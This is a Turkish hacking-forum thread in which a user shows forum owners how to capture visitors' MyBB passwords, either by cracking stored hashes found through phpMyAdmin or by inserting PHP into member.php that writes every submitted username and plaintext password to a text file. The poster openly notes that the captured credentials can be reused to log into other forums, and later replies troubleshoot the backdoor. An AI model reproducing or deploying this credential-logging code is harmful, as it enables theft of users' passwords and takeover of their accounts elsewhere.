MyBB Sitenize Girenlerin Şifresini Almak // İlk Kez Burada - S4cuRiTy EneMy -

S4cuRiTy EneMy

Yaşayan Forum Efsanesi
24 Nis 2012
8,773
6
root@server
Sa arkadaşlar, bugün sizlere sitenize girenlerin şifrelerini almanın iki yolunu göstericem

Phpmyadmin yolu ile bulmak ;

K6lrdv.png

Giriş yapip mybb'deki kullanıcı tablolarına göz atıcagız..

wbgk3b.png

w12VQN.png

Bu kısımdaki şifreleme sayesinde kullanıcının şifresini bulabilirsiniz ama bu md5 degildi sanırım mybb kendine özel bir şifreleme türudur bu bulup kırabilirseniz kullanıcı şifresine ulaşirsınız.

2-) Bu yolu paylaşayimmi paylaşmiyimmi teredütte kaldım çünku yanliş kullanım yapilabilir benim zamanında yaptıgım gibi bu kod ile %100 şifreler cekilir ve başka hack forumlarında şifreler aynı ise o forumlarada giriş yapilabilir..

Yapılıcaklar..

FTP ==> Member.php dosyasını indirin

Kod:
$file = fopen('tht.txt', 'a');
fwrite($file, $mybb->input['username'] . " " . $mybb->input['password'] . "\n\n");

İstediginiz bir kısıma kodları yazin tavsiyem php etiketinin üstu veyahutta altıdır. bu kodları yapiştirin.

Gene aynı dosyada

Kod:
$user = validate_password_from_username($mybb->input['username'], $mybb->input['password']);

yazip bitiriyoruz şimdi sistemi kurduk sayılır. Logları gelicegimiz yeri member.php dosyasıyla aynı dizinde olmalı ve dosya izinleri ( 0755 veyahutta 0777 olmalı ) eksiksiz yaparsanız çalişir ve loglar belirttigimiz .txt dosyasına kayit edilmektedir.

S4cuRiTy EneMy

Yaşayan Forum Efsanesi
24 Nis 2012
8,773
6
root@server
herşeyi senin dedğin gibi yaptım log geliyor ama boş geliyor

$user = validate_password_from_username($mybb->input['username'], $mybb->input['password']);

bu kodu eklemedim çünkü ekleyince olmuyor bozuyor ve arama yaptığımda zaten bu kodun olduğunu gördüm

Kodlarda problem olması imkansız bizzat kendi forumumda denedim free hosting felanmi ?

SkyNet96

Üye
3 Eyl 2010
128
0
İzmir
Kodlarda problem olması imkansız bizzat kendi forumumda denedim free hosting felanmi ?

free hosting değil ilk verdiğin kodu

Kod:
<?php
/**
 * MyBB 1.6
 * Copyright 2010 MyBB Group, All Rights Reserved
 *
 * Website: http://mybb.com
 * License: http://mybb.com/about/license
 *
 * $Id$
 */

buranın altına ekledim ?

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.